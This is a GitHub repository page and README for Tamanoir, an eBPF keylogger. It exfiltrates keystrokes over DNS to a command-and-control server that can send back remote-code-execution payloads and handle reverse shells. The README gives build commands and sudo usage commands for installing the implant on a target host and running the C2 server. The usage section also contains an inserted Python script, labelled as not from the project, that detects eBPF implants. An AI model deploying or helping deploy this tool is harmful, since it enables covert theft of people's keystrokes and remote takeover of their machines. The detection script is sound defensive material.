https://github.com/adgaultier/tamanoir
An eBPF🐝 Keylogger with C2-based RCE payload delivery
aya ebpf hacking keylogger linux ratatui rust security tonic
Last synced: about 1 month ago
- Host: GitHub
- URL: https://github.com/adgaultier/tamanoir
- Owner: adgaultier
- License: gpl-3.0
- Created: 2024-10-19T20:34:40.000Z (7 months ago)
- Default Branch: main
- Last Pushed: 2025-03-14T17:29:34.000Z (2 months ago)
- Last Synced: 2025-03-28T14:05:54.707Z (about 2 months ago)
- Topics: aya, ebpf, hacking, keylogger, linux, ratatui, rust, security, tonic
- Language: Rust
- Homepage:
- Size: 77.1 KB
- Stars: 256
- Watchers: 4
- Forks: 22
- Open Issues: 3
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
- License: LICENSE
Awesome Lists containing this project
- awesome-starred - adgaultier/tamanoir - An eBPF🐝 Keylogger with C2-based RCE payload delivery (Rust)
- awesome-hacking-lists - adgaultier/tamanoir - An eBPF🐝 Keylogger with C2-based RCE payload delivery (Rust)
README
Tamanoir
An eBPF🐝 Keylogger with C2-based RCE payload delivery
A large anteater of Central and South America, Myrmecophaga tridactyla
## 💡Overview
Tamanoir is structured around 3 components:
### 1. Tamanoir
An eBPF program running on a target host. It acts as a keylogger and exfiltrates keystrokes via DNS queries.
In the DNS response, the attacker can choose to send chunks of an RCE payload that will be executed on the targeted host.
### 2. Tamanoir-C2
The Command & Control server. It acts as a DNS proxy and can inject RCE payloads into DNS responses.
It can also handle reverse shell connections.
### 3. Tamanoir-tui
The TUI client that communicates with the C2 server. Built on top of ratatui.
[Figure: TUI client demo]
#### ⚡ Powered by [Aya](https://aya-rs.dev), [Tokio](https://github.com/tokio-rs/tokio), [Tonic](https://github.com/hyperium/tonic) and [Ratatui](https://ratatui.rs)
### Glossary
- what is [eBPF](https://ebpf.io/what-is-ebpf/)
- C2: Command and Control
- RCE: Remote Code Execution
### Documentation
Jump to:
- [Focus on Tamanoir (eBPF)](assets/doc/tamanoir.md)
- [Focus on Tamanoir-C2](assets/doc/tamanoir-c2.md)
- [Focus on Tamanoir-Tui](assets/doc/tamanoir-tui.md)
## Architecture
[Figure: architecture diagram]
## 🚀 Setup
You need a Linux-based OS.
### ⚒️ Build from source
To build from source, make sure you have:
- [bpf-linker](https://github.com/aya-rs/bpf-linker) installed.
- [Rust](https://www.rust-lang.org/tools/install) installed with `nightly` toolchain.
- protobuf-compiler
#### 1. Build eBPF program
```
cd tamanoir-ebpf && cargo build --release
```
#### 2. Build user space program
```
cargo build -p tamanoir --release
```
#### 3. Build C2 Server
```
cargo build -p tamanoir-c2 --release
```
#### 4. Build Ratatui Client
```
cargo build -p tamanoir-tui --release
```
These commands will produce `tamanoir`, `tamanoir-c2` and `tamanoir-tui` executables in `target/release` that you can add to your `$PATH`.
### 📥 Binary release
You can download the pre-built binaries from the [release page](https://github.com/adgaultier/tamanoir/releases)
## 🪄 Usage
### Tamanoir
🖥️ on target host:
```
RUST_LOG=info sudo -E tamanoir \
--proxy-ip \
--hijack-ip \
--iface
```
for example:
```
RUST_LOG=info sudo -E tamanoir \
--proxy-ip 192.168.1.15 \
--hijack-ip 8.8.8.8 \
--iface wlan0
```
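A host-side check a defender can run for this kind of implant, as an added example (not code from the Tamanoir project): it parses the JSON printed by `bpftool prog show --json` and flags any process that holds both a tracing-type and a traffic-handling eBPF program. The type groupings, the allowlist and the sample records are assumptions constructed for illustration; which program types Tamanoir actually loads is not stated on this page.

```python
import json

# Assumption (not from the page): bpftool program types grouped by capability.
TRACING = {"kprobe", "tracepoint", "raw_tracepoint", "tracing", "perf_event"}
NETWORK = {"sched_cls", "sched_act", "xdp", "socket_filter", "cgroup_skb"}

def owners(prog):
    """Names of processes holding the program ("pids" is present when bpftool
    was built with that support); otherwise fall back to the loading uid."""
    names = {p["comm"] for p in prog.get("pids") or []}
    return names or {f"uid:{prog.get('uid', '?')}"}

def audit(bpftool_json, allowlist=frozenset()):
    """Return {owner: {"tracing": [names], "network": [names]}} for every
    non-allowlisted owner that holds both a tracing and a network program."""
    seen = {}
    for prog in json.loads(bpftool_json):
        if prog.get("type") in TRACING:
            kind = "tracing"
        elif prog.get("type") in NETWORK:
            kind = "network"
        else:
            continue
        label = prog.get("name") or f"id:{prog.get('id')}"
        for owner in owners(prog):
            seen.setdefault(owner, {"tracing": [], "network": []})[kind].append(label)
    return {o: k for o, k in seen.items()
            if o not in allowlist and k["tracing"] and k["network"]}

# Constructed sample shaped like `bpftool prog show --json` output (all values made up).
SAMPLE = json.dumps([
    {"id": 12, "type": "cgroup_skb", "name": "fw_egress", "uid": 0,
     "pids": [{"pid": 1, "comm": "systemd"}]},
    {"id": 30, "type": "kprobe", "name": "mon_exec", "uid": 0,
     "pids": [{"pid": 700, "comm": "netmon"}]},
    {"id": 31, "type": "xdp", "name": "mon_rx", "uid": 0,
     "pids": [{"pid": 700, "comm": "netmon"}]},
    {"id": 41, "type": "kprobe", "name": "probe_a", "uid": 0,
     "pids": [{"pid": 2310, "comm": "unknown-agent"}]},
    {"id": 42, "type": "sched_cls", "name": "cls_egress", "uid": 0,
     "pids": [{"pid": 2310, "comm": "unknown-agent"}]},
    {"id": 43, "type": "sched_cls", "name": "cls_ingress", "uid": 0,
     "pids": [{"pid": 2310, "comm": "unknown-agent"}]},
    {"id": 50, "type": "tracepoint", "name": "sys_enter", "uid": 0,
     "pids": [{"pid": 900, "comm": "tracer"}]},
])

if __name__ == "__main__":
    for owner, kinds in audit(SAMPLE, allowlist={"netmon"}).items():
        print(f"review {owner}: tracing={kinds['tracing']} network={kinds['network']}")
```

On a live host, pass it the output of `sudo bpftool prog show --json`. Programs with no owning process are grouped under their loading uid.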
### C2 Server
🖥️ on your C2 server host:
```
sudo tamanoir-c2 start
```
> [!NOTE]
> Make sure port 53 is available
### Tui Client
🖥️ wherever you want to use the client:
```
tamanoir-tui -i
```
> [!NOTE]
> Make sure C2 server is reachable on port 50051
## ⚠️ Disclaimer
`Tamanoir` is developed for educational purposes only
## ✍️ Authors
[Adrien Gaultier](https://github.com/adgaultier)
[Badr Badri](https://github.com/pythops)
## ⚖️ License
GPLv3